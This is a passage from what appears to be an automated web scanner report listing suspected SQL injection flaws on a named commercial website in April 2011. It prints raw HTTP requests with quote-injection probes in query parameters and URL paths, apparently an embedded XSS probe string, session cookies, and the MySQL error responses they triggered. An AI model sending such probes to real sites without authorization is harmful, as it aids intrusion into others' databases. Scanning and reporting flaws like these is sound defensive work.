<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive''&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:01:44 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; path=/
Content-Length: 16533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

1.103. http://www.millerwelds.com/landing/drive/ [utm_content parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landing/drive/

Issue detail

The utm_content parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_content parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:32 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=B0FC82155C2EC3F1BBBD167B0997AEA7; path=/
Content-Length: 14985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=' at line 1)<br>
...[SNIP]...

Request 2

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:33 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=B8515BBB2946B5A0577F4A036E8F8BD5; path=/
Content-Length: 16533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

1.104. http://www.millerwelds.com/landing/drive/ [utm_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landing/drive/

Issue detail

The utm_medium parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_medium parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad'&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:07 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=502FC4F3B0CC4224C24AEB19BC92226F; path=/
Content-Length: 14906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landing/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad''&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:02:09 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=33DA6723A49CE218C1D7BD1E4A7A789A; path=/
Content-Length: 16533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

1.105. http://www.millerwelds.com/landing/drive/ [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landing/drive/

Issue detail

The utm_source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the utm_source parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landing/drive/?utm_source=PowerBlockTV'&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:01:18 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=5E13222BB78ACE8FA8D536638E608756; path=/
Content-Length: 14906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landing/drive/?utm_source=PowerBlockTV''&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Thu, 21 Apr 2011 11:01:20 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=B0FC82155C2EC3F1BBBD167B0997AEA7; path=/
Content-Length: 16533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

1.106. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:58 GMT
Connection: Keep-Alive
Content-Length: 27875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arro' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:59 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.107. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:48 GMT
Connection: Keep-Alive
Content-Length: 27800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:28:49 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.108. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif

Issue detail

The REST URL parameter 9 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 9, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:22 GMT
Connection: Keep-Alive
Content-Length: 27906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/prod' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:23 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.109. http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:07 GMT
Connection: Keep-Alive
Content-Length: 27831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/products/weldinghelmets/images/arrow_up.gif?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/products/weldinghelmets/images/arrow_up.gif'
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:09 GMT
Connection: Keep-Alive
Content-Length: 29444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...

1.110. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /pdf/001625sites_QMS.pdf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pdf'/001625sites_QMS.pdf HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/certifications.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:17 GMT
Connection: Keep-Alive
Content-Length: 27701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.111. http://www.millerwelds.com/pdf/001625sites_QMS.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /pdf/001625sites_QMS.pdf

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /pdf/001625sites_QMS.pdf' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/about/certifications.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.5.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:33:19 GMT
